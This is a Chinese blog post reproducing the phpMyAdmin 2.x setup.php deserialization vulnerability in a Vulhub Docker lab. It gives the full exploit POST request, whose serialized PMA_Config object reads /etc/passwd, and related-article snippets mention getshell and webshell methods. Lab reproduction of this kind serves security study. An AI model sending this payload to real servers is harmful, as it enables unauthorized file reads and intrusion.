phpmyadmin反序列化漏洞

最新推荐文章于 2024-05-27 17:25:08 发布
最新推荐文章于 2024-05-27 17:25:08 发布
阅读量565 收藏 1
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53008544/article/details/130459959
版权

一、漏洞简介

phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。

二、影响版本

phpMyAdmin phpMyAdmin 3.x
phpMyAdmin phpMyAdmin 2.11.x

三、漏洞复现

1、环境搭建

Kali搭建Vulhub环境,步骤如下:

sudo apt-get update

sudo apt-get upgrade

 

安装curl插件

apt install curl

安装docker

安装脚本curl -fsSL https://get.docker.com -o get-docker.shsh get-docker.sh

测试脚本curl -fsSL https://test.docker.com -o test-docker.shsh test-docker.sh

 

安装docker-compose

sudo apt install docker-compose

 

下载vulhub-master

# Download project

wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip

unzip vulhub-master.zip

cd vulhub-master

 

漏洞环境使用

cd WooYun-2016-199433  # 进入需要开启的漏洞路径

docker-compose up -d

 

浏览器访问漏洞地址

http://your-ip:8080

构造poc

POST /scripts/setup.php HTTP/1.1

Host:127.0.0.1:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

BurpSuite抓包:

 攻击语句执行成功。

抓包结果:

四、漏洞分析

phpmyadmin 2.x 版本中存在反序列化漏洞,当服务器执行了黑客精心构造的payload时,会造成类中的变量被修改,可以任意读取文件或任意执行代码。

一篇关于什么是反序列化的文章

一篇文章带你了解反序列化漏洞 - FreeBuf网络安全行业门户

补丁:http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12301

Child_K1ng
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpmyadmin scripts/setup.php 反序列化漏洞
千寻的博客
03-21 1738
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列化就是将对象的状态信息转为字符串储存起来那么反序列化就是再将这个。
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9512
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 5916
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 1067
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
phpMyAdmin(mysql)常见的写shell方法及版本漏洞汇总
m0_48108919的博客
02-21 7963
目录 前言 一、查看phpMyAdmin版本 二、phpmyadmin常见的getshell方法 1.前提 2.网站物理路径获取方法 3.通过into outfile getshell 4.通过日志文件写 shell 5.通过慢查询写shell 6.创建数据库和表写入webshell 总结 前言 phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具 。 一、查看phpMyAdmin版本 phpMyAdmin是有很多公开漏
总结分析 | 基于phpmyadmin的渗透测试
小司机的奥拓
09-22 2694
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 372
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
phpmyadmin漏洞_CVE20165734 phpmyadmin后台代码执行漏洞复现
weixin_39942191的博客
12-05 301
更多全球网络安全资讯尽在邑安全www.eansec.com0x01 漏洞简介Phpmyadmin是一个以php为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可以使用Web接口管理MySQL数据库。借由次Web接口可以成为一个简单方式输入SQL语法的较佳途径。其优势就是可以通过Web界面来远程管理方便建立、修改、删除数据库及资料表0x02 漏洞概述(就...
phpmyadmin弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1342
phpmyadmin弱口令至getshell 漏洞复现
记【phpMyAdmin默认安装漏洞
初学者L_言的博客
11-11 3161
一、工具 BrupSuit kali 靶机 Metasploitable2 只要是基于php-mysql 的服务器(靶机) 一般都可尝试去查看是否存在这个漏洞 二、 /setup 目录 mysql默认安装是会产生 /phpMyAdmin 这个目录, 而这个目录下有个 /setup 目录 这个目录可以在不登入的情况下访问,并对服务器的数据库进行配置 e.g. 基于安全考虑,一般服务器在配置好数据...
漏洞复现-Phpmyadmin setup.php反序列化漏洞(WooYun-2016-199433)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-04 3723
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpMyAdmin 常见漏洞利用记录
The current road is different, love needs to distinguish between right and wrong
11-26 2465
目录 简介 phpmyadmin版本信息获取 phpmyadmin密码爆破 phpmyadmin文件写入 phpmyadmin日志写shell phpmyadmin版本漏洞 phpmyadmin 2.x版本反序列化漏洞任意文件读取(wooyun-2016-199433) CVE-2016-5734 RCE命令执行 CVE-2018-12613 文件包含 结语 简介 phpMyAdmin 是一个以PHP为基础,以WebBase方式架构在网站主机上的MySQL的数据库...
CVE-2018-12613 phpadmin文件包含漏洞
鱼开yk2的博客
10-15 805
网址: https://www.phpmyadmin.net/security/PMASA-2018-4/ 摘要 文件包含和远程执行代码攻击 描述 发现了一个漏洞,攻击者可以在该漏洞中包含(查看并可能执行)服务器上的文件。 该漏洞来自代码的一部分,其中页面在phpMyAdmin中重定向和加载,以及对白名单页面的不正确测试。 除以下情况外,必须对攻击者进行身份验证: $ cfg [‘Allow...
phpmyadmin getshell总结
good good study
10-25 3147
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
Phpmyadmin 2.X 反序列化漏洞(WooYun-2016-199433)
jammny
11-28 1228
一、漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 二、漏洞影响 phpmyadmin 2.x 三、漏洞分析 https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ 四、漏洞利用 访问漏洞存在页面,并用bp进行抓包 更改请求为post并添加如下payload后发送,即可读取/etc/passwd: action=jammny&configurati.
phpmyadmin setup.php 远程包含,phpMyAdmin setup.php脚本的任意PHP代码注入漏洞
weixin_29616999的博客
03-28 556
漏洞代码在以下环境测试通过:phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2);攻击环境要求:phpMyAdmin版本:早于2.11.9.5的2.11.x和早于3.1.3.1的3.x;此漏洞只针对采用向导模式安装的ph...
Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
Grace_for_it的博客
05-03 527
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
手工挖洞学习笔记:phpMyAdmin 默认安装漏洞(小白自学)/写入webshell/写入php反弹shell
AI_Jardon的博客
08-12 1037
phpMyAdmin 默认安装 工具: (1)burpsuite (2)靶机:Metasploitable2 前提: 靶机IP:192.168.1.175 由于是http协议,所以端口:80 验证漏洞 到达靶机源url 在url中插入:…//phpMyAdmin/setup 得到: 说明存在phpMyAdmin默认安装漏洞 利用漏洞 打开burpsuite —进入repeater 如图: 开始利用漏洞: 首先:编写目标IP、端口 输入前提上的目标IP、端口 注意:此处use HTTPS 针对于使用
phpmyadmin漏洞
07-27
引用\[1\]:根据网上公开的phpMyadmin文件包含漏洞,通过代码审计定位危险函数,然后逐步分析,最终确定payload,并通过本地搭建phpMyadminV4.8.1版本成功进行漏洞复现。实际上该漏洞对于大部分版本的phpMyadmin都...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值